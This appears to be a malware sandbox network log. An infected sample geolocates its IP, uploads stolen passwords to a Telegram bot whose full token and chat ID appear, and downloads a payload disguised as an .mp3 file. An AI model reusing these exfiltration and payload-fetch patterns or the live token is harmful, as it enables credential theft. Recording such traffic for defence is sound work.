                                                                                                2025-01-16 07:30:42 UTC8000INData Raw: 71 4a f8 89 37 2f df b2 2e eb fe 1c d4 7d b8 84 23 86 a6 38 4d 7a 69 45 6c 46 d6 4b e2 25 e2 37 55 56 ab 7d e7 26 e3 61 76 41 e9 d7 ff 5e 79 77 b8 70 75 3a e1 4a 9f 41 bf 47 86 62 70 bc 4f 00 30 c6 72 ac 95 e1 b2 08 51 67 40 aa 28 ef 72 4c c8 47 8f 1f a7 25 bd 0c 14 ab 38 c4 b9 85 a0 32 c4 b4 38 ba 3e 5d 63 42 5f c4 de 2a 3c 78 27 59 41 97 90 28 91 f2 3b 6c 66 2f 45 3d 6e 40 c0 c3 84 35 1d 51 87 23 4a a0 f3 1c 65 b1 a7 12 6f 01 3d 6c ca b1 ae 96 c9 cc 48 16 44 2f 4a 21 7a 9f b8 cb 4e b1 37 f2 7e 22 a2 f5 d5 48 96 9e 1d 27 7a cd 2a fc a1 8a e3 f3 f4 fe 8c 27 a1 df d8 a9 ad 4c b8 80 97 ca 6b 06 b4 89 71 e4 ed a9 fa 1b 9d cd 3f 0c 16 ce da b9 5a af 6a 25 16 88 bb a8 76 f1 d2 e5 f0 f4 54 74 0c 12 9e c0 56 b5 f3 bf 4b 00 5d bf 76 f1 96 05 9a b1 92 57 21 47 f7
                                                                                                Data Ascii: qJ7/.}#8MziElFK%7UV}&avA^ywpu:JAGbpO0rQg@(rLG%828>]cB_*<x'YA(;lf/E=n@5Q#Jeo=lHD/J!zN7~"H'z*'Lkq?Zj%vTtVK]vW!G
                                                                                                2025-01-16 07:30:42 UTC8000INData Raw: 97 73 37 4e 4c 71 08 e6 33 4f 0b 77 ab 8f 0d c8 91 71 74 3d 12 a5 4e b5 7a b9 67 08 e7 db 13 1f 85 0d ae 92 e2 88 a2 3f 5b 45 56 bb 7d 68 4d 36 a8 d9 a6 7c c3 ca e0 60 cd b3 04 34 2d e2 3a 4a 0b a6 4a ac ec 0e 82 a7 48 89 d9 2d 36 f9 ee 16 ee 8f a8 09 1b 6e 40 4a 89 bb 2c 6e 54 4e 5b f1 47 a0 94 a0 23 80 d6 97 48 51 4f b6 cf fe 38 30 f2 89 1f 94 ea e1 8c d9 54 e2 6e 73 3c 61 4c 81 6d 8b 6c 78 c8 7f 56 32 34 fb 59 cc c0 c5 de 68 35 74 19 66 bd 47 d7 ef b0 b0 f1 45 81 bd 1b 6e 33 d7 70 44 5e c0 e2 07 68 fd f4 18 32 10 d5 be c9 bd 5a 2f 8e 68 08 32 6b d7 fe f6 80 41 c9 71 da 46 e1 27 61 f6 65 d8 68 7d 45 cb 13 a6 33 09 92 92 54 86 93 16 f1 04 eb 59 7b 80 a9 15 30 f8 11 49 cc aa 3e f4 c2 b0 41 ee 43 fc 7b e8 ce de 0a 37 ec 94 a3 89 81 da f9 f3 d8 88 a6 73 0b
                                                                                                Data Ascii: s7NLq3Owqt=Nzg?[EV}hM6|`4-:JJH-6n@J,nTN[G#HQO80Tns<aLmlxV24Yh5tfGEn3pD^h2Z/h2kAqF'aeh}E3TY{0I>AC{7s
                                                                                                2025-01-16 07:30:42 UTC8000INData Raw: 5e f3 88 fd 93 64 e9 aa ed 4d 17 6a 40 54 db b5 b2 ff 2b 14 fb ed 35 fb 75 98 90 6e cd 39 b8 56 07 94 48 e6 4d 2b 40 53 c9 ad ec c0 05 4e e7 8e 8a fc bf 4b a3 01 5b ad 3e 4d b2 ca be 00 54 85 4e 45 22 4a 17 f7 a1 74 18 89 8b 0c 42 d6 f4 82 b4 1f 03 c9 1c 64 26 47 f7 02 a1 d2 46 3c 5a d5 59 e9 73 f0 b2 86 60 d6 95 14 15 2a c1 11 1a 92 50 9e 88 30 66 33 36 0a c6 0a a4 cb 9f 7e 8b 7c fc 11 c8 c9 3c f4 6a 03 ab d1 18 93 c3 6e 9c 99 39 b3 d2 f3 8f e8 e9 17 fb f1 6d 92 7e 62 93 4d 54 1a b1 97 45 fe 05 f1 12 55 02 11 a6 10 27 30 17 ae eb e7 04 b8 fc e3 21 be b8 72 2b ce 6d 7f 04 d1 aa 2a 4c 5f fb 55 2e 61 44 1d c5 25 39 02 be 1e 42 b0 16 a2 a3 94 3a 03 d0 e9 91 4f 9b 66 ea 67 0d af 8e df 1c 8c de e7 48 68 0a cd e2 79 a0 fc e3 10 fd 72 c1 01 31 79 a6 ed 5f f7 87
                                                                                                Data Ascii: ^dMj@T+5un9VHM+@SNK[>MTNE"JtBd&GF<ZYs`*P0f36~|<jn9m~bMTEU'0!r+m*L_U.aD%9B:OfgHhyr1y_
                                                                                                2025-01-16 07:30:43 UTC8000INData Raw: 96 c6 c3 e4 39 47 17 04 58 19 94 f0 c8 b8 68 d2 33 fa 48 f3 ce 5d 1e eb f1 29 79 db 16 2a b4 7d 76 a9 a6 73 29 5f bc 41 ad 74 8c 60 76 d1 34 bd 36 1c 01 d7 f6 79 49 1f f9 f1 5d bd f4 80 80 c8 18 8f 56 b1 bd af 7e 04 00 c3 53 ed 09 70 25 19 de b7 c6 3f b5 e7 fd 41 21 f6 ec 64 d2 c5 2f 18 78 bf 36 1c e7 28 49 5c 2f 14 5a 5e 3d 1e 79 bb ba cc 0a 60 f2 a1 3a 77 0f b1 f1 e8 04 20 74 4a 23 6c 3f 48 3e 6c 78 1c cb f1 8b 2d e1 d2 78 9f 2f 10 81 08 d0 28 76 ac 18 c1 69 66 2b 3d e2 c8 f8 e0 cc c0 99 87 ae 3e a0 91 8c 9c b4 75 2a bf 7f 22 06 ec b6 64 d8 79 3b 50 b8 71 0f d9 1c 91 c8 32 a9 e4 15 32 13 2a a2 3c d2 7a fe b2 0c 41 39 3d aa 43 ac ab fa 48 8c bf 9a 6c 46 7d 3b bf a3 3f 0c d5 49 7b 72 cd 2b 2b 06 10 77 2a 30 3c 6e 14 43 55 d1 43 10 ac af bd 51 78 87 0c 08
                                                                                                Data Ascii: 9GXh3H])y*}vs)_At`v46yI]V~Sp%?A!d/x6(I\/Z^=y`:w tJ#l?H>lx-x/(vif+=>u*"dy;Pq22*<zA9=CHlF};?I{r++w*0<nCUCQx
                                                                                                2025-01-16 07:30:43 UTC8000INData Raw: 31 c5 c5 26 58 66 f6 1b 1c 08 d3 5f c9 a8 8c dc 6d fb cd 74 34 eb e6 23 94 ea 9b c6 4b e5 38 a3 79 bb a9 42 e4 32 a8 26 15 45 9a e6 28 d6 5d 27 3f be 4e b6 8b 5b c6 15 aa 80 af 34 b3 23 0a d6 b7 25 e1 83 af 61 14 27 db 01 12 3a b1 02 22 ac 84 ff dd a8 1d aa ab a8 00 dd cc c3 b2 57 ee 56 4e b2 51 f8 67 a1 c9 ad 6e 27 37 e3 68 f8 d9 41 70 f2 e9 fd fb eb 4a c5 ab 54 89 ac 79 e3 73 b7 b1 e5 f4 96 c4 f1 c3 4e 8b 41 aa ff 0d b4 54 d7 fe ff 80 a9 27 7d 63 17 9b fa 65 c4 db 1e 40 43 2d 76 14 02 bd da d2 50 dc 10 f5 43 a0 7e aa b7 64 65 b6 aa 6a 7e cf 9e fb d1 1e 3a 8c f2 55 ff 0b ab 6d eb 35 77 ff 38 b1 25 05 73 27 d0 67 af a1 e1 b2 93 e5 4c 0b 8b f0 f3 37 d8 e4 b7 27 aa ef b4 01 1a da b6 21 4c 80 e7 f8 67 71 1a 8f 88 0a f8 d1 ce 82 37 d8 84 c6 40 2a e3 ee 8d 57
                                                                                                Data Ascii: 1&Xf_mt4#K8yB2&E(]'?N[4#%a':"WVNQgn'7hApJTysNAT'}ce@C-vPC~dej~:Um5w8%s'gL7'!Lgq7@*W
                                                                                                2025-01-16 07:30:43 UTC8000INData Raw: e7 e6 d7 ae c2 52 07 82 88 4f 2c 2e 56 f4 83 13 4a 9b 93 65 e6 3f 0b 17 25 1a 18 f8 ea ea 23 27 88 33 fc 0e 88 da fa 2d 6f db a6 b6 e2 af ed 61 6f 70 1a 60 f6 d4 7e 99 ab 4d 3a 4d 86 07 6a 94 f8 88 e3 8c 1e 46 08 b6 61 d8 c7 5a f1 29 ed 56 63 74 9b de 8a eb 65 4b 6b 67 62 5d 20 c4 f8 6a 12 e3 a2 ab 39 27 e0 6b f8 fd 4c 8f 21 91 e5 13 c8 92 ca 13 bb 50 e2 64 a6 59 e6 c3 1e 90 e9 22 50 6f 6e 89 7e 18 b0 da 14 8c 2f bb 86 c0 ea 0a d1 b9 0b 27 f3 60 bf 5f f0 19 9e a6 a3 2d bf 03 b6 8a 03 ea 2f c2 52 64 e4 2a 8a 8b d8 65 11 42 da 13 02 eb 5a f2 d4 e8 82 dc b0 49 a6 9b 17 c7 b9 71 a3 75 28 8d d9 0f ee df 04 c6 29 3c e3 41 13 a7 88 7d a3 62 4d fe 84 ea 37 68 49 d9 44 92 57 bb 62 f1 14 d5 b8 bb 11 86 65 e0 5f 2e b4 e4 c1 64 63 c4 59 53 e2 58 f6 4e d8 af c4 ab e3
                                                                                                Data Ascii: RO,.VJe?%#'3-oaop`~M:MjFaZ)VcteKkgb] j9'kL!PdY"Pon~/'`_-/Rd*eBZIqu()<A}bM7hIDWbe_.dcYSXN
                                                                                                2025-01-16 07:30:43 UTC8000INData Raw: f8 f6 56 91 fc 7f ff a0 60 3c 1d ca 48 d9 1d b0 4c 28 34 70 fd 1d 75 55 d4 89 ea 23 6d c6 de da 13 37 5d d3 d8 fb ef a7 6d ae 8e 75 85 99 f5 7a 8b 9b 0e f3 ae 66 13 33 55 be f7 44 ca ee b3 47 be 07 59 09 f4 36 2c c1 d0 63 d7 e5 ee e4 86 e9 51 65 b2 5b 16 70 ba 34 6d d9 bb e7 bc bd 25 74 e7 76 45 85 ab 52 8e 2e 4c 6d b3 85 08 3c 6e fb 52 19 4a d7 92 86 f3 3b c2 39 99 72 87 63 dd 39 9d 46 96 eb ac b9 bb 39 ec 34 ca 3a 27 e3 f8 b8 7b bb f9 73 b1 12 4d cc d8 d8 12 2b cc 21 69 84 6e 48 0e 26 39 73 84 dd 2a 00 8a fb f1 f9 0a 31 06 cb 7e 45 63 df f2 05 41 59 a2 24 74 39 0f 04 65 f2 5c ef 61 c6 a6 b0 c2 3c 0b 5b e1 1d bc ad 44 b7 b2 7c ff b4 bc 2f 0f 7d a2 65 75 64 1c 2e 27 c9 d7 6d 0c 31 6d f7 ae 7d f1 33 bf f6 25 9b 5f 01 79 6a 84 bc 6b a4 1b a7 13 8d 43 5e 51
                                                                                                Data Ascii: V`<HL(4puU#m7]muzf3UDGY6,cQe[p4m%tvER.Lm<nRJ;9rc9F94:'{sM+!inH&9s*1~EcAY$t9e\a<[D|/}eud.'m1m}3%_yjkC^Q
                                                                                                2025-01-16 07:30:43 UTC8000INData Raw: 9f e5 29 a6 af 33 ed 62 60 73 13 9c f3 24 1f 5f 78 aa 0c 04 b3 f3 e2 ef 09 4a 10 77 b3 54 ae c5 86 ba 4a 89 3b be 81 9d cc 71 e2 98 b8 d1 5c 34 04 f2 b7 0e 71 d8 cd db e1 33 3f 99 f1 65 8b 01 e1 a8 f9 5a 83 59 ec 66 e7 f8 63 4f e8 2d 38 aa 91 fb d5 65 25 7a 40 0a 93 bb f7 15 62 af 4b 9b f8 52 99 1a 23 a9 a3 49 7c 6e c5 d1 9b 32 96 2b f7 55 5a df 10 11 8c 4f 36 ff bf 81 fd d7 6e f5 bb 3d 3c 11 a9 51 87 98 88 46 e8 fa cc 8e 89 e1 7b db 0f 9e 9a 24 51 80 4e 25 c8 1a 3d 95 4d 1c 56 dc 31 ee b9 c3 2b 65 bb 08 12 bc d5 3b 18 6b b2 b3 ca 2c 01 00 60 2b 4f 8a ed f1 f9 1d 04 66 c6 c9 c9 31 e5 6c d7 1e 64 18 b0 8d 41 e0 13 3a ac 8e 58 a2 13 4f 7f d1 55 da e5 4f 9e b0 eb 62 36 67 d8 bb 2e 57 71 49 31 38 05 04 6c 70 57 b5 49 be 9e 19 e4 9e a0 d4 62 10 f5 7f b8 bc e0
                                                                                                Data Ascii: )3b`s$_xJwTJ;q\4q3?eZYfcO-8e%z@bKR#I|n2+UZO6n=<QF{$QN%=MV1+e;k,`+Of1ldA:XOUOb6g.WqI18lpWIb


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549758104.21.96.14432072C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-16 07:30:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-16 07:30:57 UTC851INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:30:57 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Age: 2327446
                                                                                                Cache-Control: max-age=31536000
                                                                                                cf-cache-status: HIT
                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L0ysDhHDsJZIeY0o5ZOcDHemzZpDcM3ntkSL0no8GjXU1iK%2BzbCYMndbxo2RkYITrOM6wahr3GlcweXgTe04nPsstoCkpAgV1opVrg5ZmZLSDeLRL33j1WX528gLNcB4QavuWdHo"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 902c67350bfb42c0-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1669&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1649717&cwnd=212&unsent_bytes=0&cid=1d65cd57cbdd490f&ts=222&x=0"
                                                                                                2025-01-16 07:30:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549799149.154.167.2204432072C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-16 07:31:03 UTC296OUTPOST /bot7666772215:AAG3oWDDhgYedd4yOneZp0AStrhY_tgTlTc/sendDocument?chat_id=5830304904&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary================8dd35d5d1e97e85
                                                                                                Host: api.telegram.org
                                                                                                Content-Length: 1088
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-16 07:31:03 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 64 35 64 31 65 39 37 65 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: --===============8dd35d5d1e97e85Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                2025-01-16 07:31:04 UTC388INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Thu, 16 Jan 2025 07:31:04 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 570
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                2025-01-16 07:31:04 UTC570INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 36 36 37 37 32 32 31 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 52 75 73 73 69 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 6f 6c 69 63 65 72 65 70 6f 72 74 65 72 73 32 30 32 35 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 30 33 30 34 39 30 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 65 6c 65 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 69 66 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 77 77 77 77 77 77 32 32 32 32 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33
                                                                                                Data Ascii: {"ok":true,"result":{"message_id":350,"from":{"id":7666772215,"is_bot":true,"first_name":"N Russia","username":"Policereporters2025bot"},"chat":{"id":5830304904,"first_name":"Helen","last_name":"Gif","username":"wwwwwww222222","type":"private"},"date":173


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549831166.62.28.1474431088C:\Users\user\AppData\Roaming\TypeId.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-16 07:31:08 UTC210OUTGET /panel/uploads/Cicycmiv.mp3 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: az-ka.com
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-16 07:31:09 UTC296INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:31:08 GMT
                                                                                                Server: Apache
                                                                                                Upgrade: h2,h2c
                                                                                                Connection: Upgrade, close
                                                                                                Last-Modified: Wed, 15 Jan 2025 21:31:18 GMT
                                                                                                ETag: "68019e-119a08-62bc565e18a6c"
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 1153544
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Type: audio/mpeg
                                                                                                2025-01-16 07:31:09 UTC7896INData Raw: 50 11 6a 49 9a 74 8a b6 13 0e d1 30 71 b9 a5 a2 8c 29 91 2b 6a 2b fc 40 26 0b 1d 79 1b 83 9b 50 68 05 dc 92 0b 5b db 7b 85 58 34 65 b5 77 a8 d2 cb 85 39 fc f8 92 b2 3c 78 3f 97 11 f5 f2 69 8c 9b 54 f9 24 fc 72 73 06 29 40 aa bd 76 78 25 d9 fe a4 d8 d5 01 30 5d 0f d0 65 99 4f 8e 26 14 1e 4c 8e 77 fe a3 da 94 50 13 99 7f 05 0f 1f 01 a4 0d 15 2e eb b4 ba b8 f1 96 65 0b 24 f4 75 2b 84 09 8d af a9 9d 14 ca 8d 96 bb 6f 90 af b7 e2 c2 bb c2 6e c3 26 f1 b7 df 62 92 6c e4 60 a0 4b 4d 2d 0c 0e 18 6d 07 6b 19 db 5a 37 bc 95 fd 1f a6 8c a5 fe 7a f1 96 f1 1b d9 22 63 13 10 a5 23 c8 70 a5 e0 26 95 7b b0 fb 35 2c d1 da d7 48 7d fb 60 a7 fc 1d ea 66 de a3 b3 a3 ef fa 85 bd 2a 52 9e 37 4c 2e 0e 56 93 aa 3f 55 f0 4d ed 64 07 53 bc 32 d6 20 0e dd 77 4d 34 33 eb 84 c1 de c3
                                                                                                Data Ascii: PjIt0q)+j+@&yPh[{X4ew9<x?iT$rs)@vx%0]eO&LwP.e$u+on&bl`KM-mkZ7z"c#p&{5,H}`f*R7L.V?UMdS2 wM43
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: e7 ac e0 df 6d 61 9f 8e df f1 85 f4 77 bb 63 27 a3 7f f9 87 45 97 92 a3 42 e7 ea 26 c8 18 d1 69 8f 95 bc 11 2c 8e 6a fc 50 77 e2 f3 ad 44 3d ab 68 46 10 86 e5 d5 d7 9d 29 9c 9e a4 62 8b 5d eb bb 40 66 0d de 1b 81 a6 d4 59 1e 8a a5 69 9e 3a 3a fa 30 ca ae 63 9e c1 86 69 a6 04 e4 56 fd 82 5c b7 44 ae 48 4f 4f d5 9e 28 c8 71 24 7b ee 9b 42 4b 9d 97 69 92 bc 4e fe 5e ba 9d 26 a2 39 23 3b a6 ce 3f 6d 10 94 d5 37 ba 9f 43 4d 30 c0 19 64 e4 53 75 9e 53 49 54 20 34 30 20 16 73 04 78 1a ef 83 50 5e 8d e0 60 e8 77 b3 b5 19 05 8c af 70 70 27 67 32 35 fa af 88 6b 71 ee db 36 38 a2 27 e1 3d 83 f3 a3 52 1c 14 b2 c6 81 50 f6 15 6c fd de 3d b6 72 26 e0 ea d8 f1 dc 0e cf ba 88 0c 08 8d 11 02 13 46 4a b9 91 7e db 88 b8 15 5e 91 f2 a7 de fc f4 1f 07 8f 97 dc a5 71 2f 75 8f
                                                                                                Data Ascii: mawc'EB&i,jPwD=hF)b]@fYi::0ciV\DHOO(q${BKiN^&9#;?m7CM0dSuSIT 40 sxP^`wpp'g25kq68'=RPl=r&FJ~^q/u
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: 71 4a f8 89 37 2f df b2 2e eb fe 1c d4 7d b8 84 23 86 a6 38 4d 7a 69 45 6c 46 d6 4b e2 25 e2 37 55 56 ab 7d e7 26 e3 61 76 41 e9 d7 ff 5e 79 77 b8 70 75 3a e1 4a 9f 41 bf 47 86 62 70 bc 4f 00 30 c6 72 ac 95 e1 b2 08 51 67 40 aa 28 ef 72 4c c8 47 8f 1f a7 25 bd 0c 14 ab 38 c4 b9 85 a0 32 c4 b4 38 ba 3e 5d 63 42 5f c4 de 2a 3c 78 27 59 41 97 90 28 91 f2 3b 6c 66 2f 45 3d 6e 40 c0 c3 84 35 1d 51 87 23 4a a0 f3 1c 65 b1 a7 12 6f 01 3d 6c ca b1 ae 96 c9 cc 48 16 44 2f 4a 21 7a 9f b8 cb 4e b1 37 f2 7e 22 a2 f5 d5 48 96 9e 1d 27 7a cd 2a fc a1 8a e3 f3 f4 fe 8c 27 a1 df d8 a9 ad 4c b8 80 97 ca 6b 06 b4 89 71 e4 ed a9 fa 1b 9d cd 3f 0c 16 ce da b9 5a af 6a 25 16 88 bb a8 76 f1 d2 e5 f0 f4 54 74 0c 12 9e c0 56 b5 f3 bf 4b 00 5d bf 76 f1 96 05 9a b1 92 57 21 47 f7
                                                                                                Data Ascii: qJ7/.}#8MziElFK%7UV}&avA^ywpu:JAGbpO0rQg@(rLG%828>]cB_*<x'YA(;lf/E=n@5Q#Jeo=lHD/J!zN7~"H'z*'Lkq?Zj%vTtVK]vW!G
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: 97 73 37 4e 4c 71 08 e6 33 4f 0b 77 ab 8f 0d c8 91 71 74 3d 12 a5 4e b5 7a b9 67 08 e7 db 13 1f 85 0d ae 92 e2 88 a2 3f 5b 45 56 bb 7d 68 4d 36 a8 d9 a6 7c c3 ca e0 60 cd b3 04 34 2d e2 3a 4a 0b a6 4a ac ec 0e 82 a7 48 89 d9 2d 36 f9 ee 16 ee 8f a8 09 1b 6e 40 4a 89 bb 2c 6e 54 4e 5b f1 47 a0 94 a0 23 80 d6 97 48 51 4f b6 cf fe 38 30 f2 89 1f 94 ea e1 8c d9 54 e2 6e 73 3c 61 4c 81 6d 8b 6c 78 c8 7f 56 32 34 fb 59 cc c0 c5 de 68 35 74 19 66 bd 47 d7 ef b0 b0 f1 45 81 bd 1b 6e 33 d7 70 44 5e c0 e2 07 68 fd f4 18 32 10 d5 be c9 bd 5a 2f 8e 68 08 32 6b d7 fe f6 80 41 c9 71 da 46 e1 27 61 f6 65 d8 68 7d 45 cb 13 a6 33 09 92 92 54 86 93 16 f1 04 eb 59 7b 80 a9 15 30 f8 11 49 cc aa 3e f4 c2 b0 41 ee 43 fc 7b e8 ce de 0a 37 ec 94 a3 89 81 da f9 f3 d8 88 a6 73 0b
                                                                                                Data Ascii: s7NLq3Owqt=Nzg?[EV}hM6|`4-:JJH-6n@J,nTN[G#HQO80Tns<aLmlxV24Yh5tfGEn3pD^h2Z/h2kAqF'aeh}E3TY{0I>AC{7s
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: 5e f3 88 fd 93 64 e9 aa ed 4d 17 6a 40 54 db b5 b2 ff 2b 14 fb ed 35 fb 75 98 90 6e cd 39 b8 56 07 94 48 e6 4d 2b 40 53 c9 ad ec c0 05 4e e7 8e 8a fc bf 4b a3 01 5b ad 3e 4d b2 ca be 00 54 85 4e 45 22 4a 17 f7 a1 74 18 89 8b 0c 42 d6 f4 82 b4 1f 03 c9 1c 64 26 47 f7 02 a1 d2 46 3c 5a d5 59 e9 73 f0 b2 86 60 d6 95 14 15 2a c1 11 1a 92 50 9e 88 30 66 33 36 0a c6 0a a4 cb 9f 7e 8b 7c fc 11 c8 c9 3c f4 6a 03 ab d1 18 93 c3 6e 9c 99 39 b3 d2 f3 8f e8 e9 17 fb f1 6d 92 7e 62 93 4d 54 1a b1 97 45 fe 05 f1 12 55 02 11 a6 10 27 30 17 ae eb e7 04 b8 fc e3 21 be b8 72 2b ce 6d 7f 04 d1 aa 2a 4c 5f fb 55 2e 61 44 1d c5 25 39 02 be 1e 42 b0 16 a2 a3 94 3a 03 d0 e9 91 4f 9b 66 ea 67 0d af 8e df 1c 8c de e7 48 68 0a cd e2 79 a0 fc e3 10 fd 72 c1 01 31 79 a6 ed 5f f7 87
                                                                                                Data Ascii: ^dMj@T+5un9VHM+@SNK[>MTNE"JtBd&GF<ZYs`*P0f36~|<jn9m~bMTEU'0!r+m*L_U.aD%9B:OfgHhyr1y_
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: 96 c6 c3 e4 39 47 17 04 58 19 94 f0 c8 b8 68 d2 33 fa 48 f3 ce 5d 1e eb f1 29 79 db 16 2a b4 7d 76 a9 a6 73 29 5f bc 41 ad 74 8c 60 76 d1 34 bd 36 1c 01 d7 f6 79 49 1f f9 f1 5d bd f4 80 80 c8 18 8f 56 b1 bd af 7e 04 00 c3 53 ed 09 70 25 19 de b7 c6 3f b5 e7 fd 41 21 f6 ec 64 d2 c5 2f 18 78 bf 36 1c e7 28 49 5c 2f 14 5a 5e 3d 1e 79 bb ba cc 0a 60 f2 a1 3a 77 0f b1 f1 e8 04 20 74 4a 23 6c 3f 48 3e 6c 78 1c cb f1 8b 2d e1 d2 78 9f 2f 10 81 08 d0 28 76 ac 18 c1 69 66 2b 3d e2 c8 f8 e0 cc c0 99 87 ae 3e a0 91 8c 9c b4 75 2a bf 7f 22 06 ec b6 64 d8 79 3b 50 b8 71 0f d9 1c 91 c8 32 a9 e4 15 32 13 2a a2 3c d2 7a fe b2 0c 41 39 3d aa 43 ac ab fa 48 8c bf 9a 6c 46 7d 3b bf a3 3f 0c d5 49 7b 72 cd 2b 2b 06 10 77 2a 30 3c 6e 14 43 55 d1 43 10 ac af bd 51 78 87 0c 08
                                                                                                Data Ascii: 9GXh3H])y*}vs)_At`v46yI]V~Sp%?A!d/x6(I\/Z^=y`:w tJ#l?H>lx-x/(vif+=>u*"dy;Pq22*<zA9=CHlF};?I{r++w*0<nCUCQx
